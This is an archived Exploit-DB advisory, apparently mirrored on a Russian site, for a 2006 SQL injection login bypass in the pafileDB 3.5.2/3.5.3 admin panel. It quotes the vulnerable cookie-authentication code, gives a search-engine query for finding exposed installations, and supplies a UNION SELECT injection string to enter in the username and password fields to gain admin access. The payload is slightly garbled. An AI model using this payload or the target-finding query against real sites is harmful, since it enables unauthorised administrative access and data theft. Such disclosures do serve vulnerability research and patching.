- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2899
- Проверка EDB
-
- Пройдено
- Автор
- KORAY
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2006-12-08
Код:
# PafileDB Login SQL injection =)
# author : koray & [email protected]
# Risk : High
# Class : Remote
# Vulnerable Script : pafileDB
# Version : 3.5.2 / 3.5.3
# google : powered by pafiledb 3.5.3/2
# greetz : www.cigicigi.net & redhackers
Vulnerable;
include/admin/auth.php
c0de ;
if (isset($_COOKIE['pafiledb_user']) && isset($_COOKIE['pafiledb_pass'])) { //If the cookie exists, do all this:
$admininfo = array();
if (checkpass($_COOKIE['pafiledb_user'], $_COOKIE['pafiledb_pass'], $admininfo)) {
//checkpass() returned true, so the user exists
//$adminloggedin is a var used throughout the script to see if someone's logged in.
$adminloggedin = true;
$smarty->assign('admininfo', $admininfo[0]);
} else { //The cookie exists, but the user/pass don't match
...
username : 1%20union%20select%%20201,2,3,4/*
password : 1%20union%20select%%20201,2,3,4/* /
pafile/pafiledb.php?action=admin logged...
# milw0rm.com [2006-12-08]- Источник
- www.exploit-db.com
